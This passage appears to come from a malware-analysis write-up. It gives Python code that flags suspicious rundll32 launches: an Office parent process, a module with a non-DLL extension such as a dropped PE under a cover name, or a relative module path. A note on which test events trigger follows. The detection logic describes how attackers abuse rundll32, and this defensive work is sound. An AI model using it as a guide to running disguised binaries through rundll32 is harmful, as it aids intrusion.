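              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
DLL_LIKE_EXTS = {".dll", ".cpl", ".ocx", ".ax", ".drv"}
RUNDLL32_RE = re.compile(r'^\s*"?(?:\S*\\)?rundll32(?:\.exe)?"?\s+(?P<rest>\S.*)$', re.I)


def parse_rundll32(cmdline: str):
    """Return (module, export) for a rundll32 command line, or None if it is not one."""
    m = RUNDLL32_RE.match(cmdline)
    if not m:
        return None
    rest = m.group("rest")
    if rest.startswith('"'):                 # quoted module path, may contain spaces
        end = rest.find('"', 1)
        if end < 0:
            return None
        module, tail = rest[1:end], rest[end + 1:]
        export = tail[1:].split(None, 1)[0] if tail.startswith(",") and tail[1:].strip() else None
    else:
        module, _, export = rest.split(None, 1)[0].partition(",")
        export = export or None
    return module, export


def flag_rundll32(events):
    """One finding per rundll32 event that shows at least one suspicious trait."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if ntpath.basename(e.image).lower() != "rundll32.exe":
            continue
        parsed = parse_rundll32(e.cmdline)
        if parsed is None:
            continue
        module, export = parsed
        ext = ntpath.splitext(module)[1].lower()
        parent = by_pid.get(e.ppid)
        reasons = []
        if parent and ntpath.basename(parent.image).lower() in OFFICE_IMAGES:
            reasons.append("parent is an Office process")
        if ext not in DLL_LIKE_EXTS:         # e.g. .fii: a dropped PE under a cover name
            reasons.append(f"module extension {ext or '(none)'} is not DLL-like")
        if module.startswith(("..\\", ".\\", "../", "./")):
            reasons.append("module path is relative")
        if reasons:
            findings.append({"pid": e.pid, "module": module, "export": export, "reasons": reasons})
    return findings
```

On the constructed events the first rundll32 is flagged for all three reasons and the WOW64 child for the extension and relative path; the shell32.dll control row produces no finding. Relative paths are flagged only when they begin with `.\` or `..\`, because a bare `shell32.dll` resolves through the normal search path and is routine.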

                            Disassembly

                            Code Analysis
